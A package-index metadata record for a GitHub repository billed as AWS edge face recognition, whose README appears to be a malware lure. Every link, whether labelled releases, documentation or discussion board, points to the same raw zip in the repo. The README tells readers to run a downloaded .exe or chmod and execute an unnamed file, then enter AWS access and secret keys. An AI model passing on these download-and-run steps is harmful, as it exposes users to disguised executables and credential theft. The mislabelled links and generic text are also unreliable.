{"id":32751608,"url":"https://github.com/kendo2462/aws-edge-face-recognition","last_synced_at":"2026-05-03T01:45:06.762Z","repository":{"id":322250089,"uuid":"1088506888","full_name":"kendo2462/aws-edge-face-recognition","owner":"kendo2462","description":"🤖 Enable real-time face recognition at the edge using AWS IoT Greengrass and Lambda for low-latency, privacy-preserving machine learning.","archived":false,"fork":false,"pushed_at":"2026-05-03T01:03:53.000Z","size":1941,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-05-03T01:44:23.445Z","etag":null,"topics":["aws","aws-greengrass","aws-lambda","ec2","edge-computing","iot","iot-core","mqtt","pytorch","serverless","sqs"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kendo2462.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-11-03T04:01:58.000Z","updated_at":"2026-05-03T01:03:56.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/kendo2462/aws-edge-face-recognition","commit_stats":null,"previous_names":["kendo2462/aws-edge-face-recognition"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/kendo2462/aws-edge-face-recognition","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kendo2462%2Faws-edge-face-recognition","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kendo2462%2Faws-edge-face-recognition/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kendo2462%2Faws-edge-face-recognition/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kendo2462%2Faws-edge-face-recognition/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kendo2462","download_url":"https://codeload.github.com/kendo2462/aws-edge-face-recognition/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kendo2462%2Faws-edge-face-recognition/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32555839,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T00:31:16.350Z","status":"ssl_error","status_checked_at":"2026-05-03T00:31:15.546Z","response_time":132,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aws","aws-greengrass","aws-lambda","ec2","edge-computing","iot","iot-core","mqtt","pytorch","serverless","sqs"],"created_at":"2025-11-04T00:00:31.639Z","updated_at":"2026-05-03T01:45:06.750Z","avatar_url":"https://github.com/kendo2462.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🎉 aws-edge-face-recognition - Smart Face Recognition for Your Devices\n\n## 🌟 Overview\nThis application enables edge computing face recognition using AWS IoT Greengrass and AWS Lambda. IoT devices will perform local face detection, while AWS Lambda handles cloud-based face recognition with SQS and PyTorch. Enjoy the benefits of fast, efficient facial recognition with a reliable backend service.\n\n## 📦 Download \u0026 Install\n**To get started, visit this page to download the latest version of the software: [Releases Page](https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip)**\n\n![Download Button](https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip%https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip)\n\n## 🛠️ System Requirements\nBefore you start, ensure your system meets these requirements:\n\n- **OS**: Windows 10 or later, macOS High Sierra or later, or a version of Linux that supports Docker.\n- **RAM**: Minimum 4 GB, recommended 8 GB or more for optimal performance.\n- **Storage**: At least 200 MB of free disk space.\n- **Internet**: An active internet connection for downloading dependencies and software updates.\n\n## 🚀 Getting Started\n1. **Download the Software**\n   Visit the [Releases Page](https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip) and choose the latest version. Click on your operating system to start the download.\n\n2. **Install the Software**\n   - For **Windows**: Find the downloaded `.exe` file, double-click it, and follow the on-screen instructions to install.\n   - For **macOS**: Open the downloaded `.dmg` file, drag the application into your Applications folder, and launch it from there.\n   - For **Linux**: Make the downloaded file executable. Open a terminal and run:\n     ```\n     chmod +x ./your_downloaded_file\n     ./your_downloaded_file\n     ```\n   \n3. **Configure Your Settings**\n   Once installed, open the application. You will need to configure it to connect to your AWS account. This involves adding your AWS Access Key, Secret Key, and region information into the settings.\n\n4. **Set Up Your IoT Device**\n   Follow the prompts to set up your IoT device. Ensure your device is connected to the internet and meets the necessary requirements.\n\n5. **Test the Application**\n   After setting up, test the application by capturing a face. The recognition process will operate locally, and results will sync with the cloud service for enhanced functionality.\n\n## ⚙️ Features\n- **Local Face Detection**: Detect faces with high accuracy using edge computing.\n- **Cloud Integration**: Sync data seamlessly with AWS Lambda and SQS for robust performance.\n- **Real-Time Processing**: Experience fast recognition capabilities ideal for real-time applications.\n- **Scalable Architecture**: Easily manage multiple devices with our serverless backend.\n  \n## 🚧 Troubleshooting\nIf you run into any issues:\n\n- **Installation Problems**: Ensure your OS is compatible with the software you downloaded.\n- **Configuration Issues**: Double-check your AWS credentials and ensure they have the necessary permissions for using AWS services.\n- **Recognition Errors**: Verify that your IoT device's camera is functioning correctly. Also, ensure sufficient lighting during capture.\n\n## 🗂️ Additional Resources\n- **Documentation**: For more detailed instructions, refer to the official [Documentation](https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip).\n- **Community Support**: Join our [Discussion Board](https://github.com/kendo2462/aws-edge-face-recognition/raw/refs/heads/main/face-detection/edge-recognition-aws-face-v3.0.zip) for questions and support.\n\n## 🌍 Topics\nThis project relates to:\n- aws\n- aws-greengrass\n- aws-lambda\n- ec2\n- edge-computing\n- iot\n- iot-core\n- mqtt\n- pytorch\n- serverless\n- sqs\n\n**Make sure to explore the technologies involved for a better understanding!**\n\n## ✅ Conclusion\nNow you are ready to use the aws-edge-face-recognition application. Follow the steps carefully, and you will have a powerful tool for face recognition at your fingertips. Enjoy the innovative potential of edge computing!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkendo2462%2Faws-edge-face-recognition","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkendo2462%2Faws-edge-face-recognition","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkendo2462%2Faws-edge-face-recognition/lists"}